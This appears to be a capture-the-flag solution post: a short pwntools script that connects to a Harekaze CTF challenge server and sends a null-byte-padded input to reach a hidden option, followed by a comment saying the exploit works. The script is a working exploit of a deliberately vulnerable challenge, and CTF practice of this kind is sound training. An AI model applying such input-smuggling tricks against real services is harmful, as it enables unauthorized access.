Rating: 2.7

Author: h3rcul35
```
from pwn import *

#p=process('./harekaze_farm')
p=remote('problem.harekaze.com',20328)
p.sendline("cow")
payload="hen"+"\x00"*5+"isoroku"+"\x00"
p.sendline(payload)
p.sendline("isoroku")
print p.recvall()
```

ch3ny4n6 – Feb. 12, 2018, 5:27 p.m.

This exploit works. I don't know why someone gave one star on this.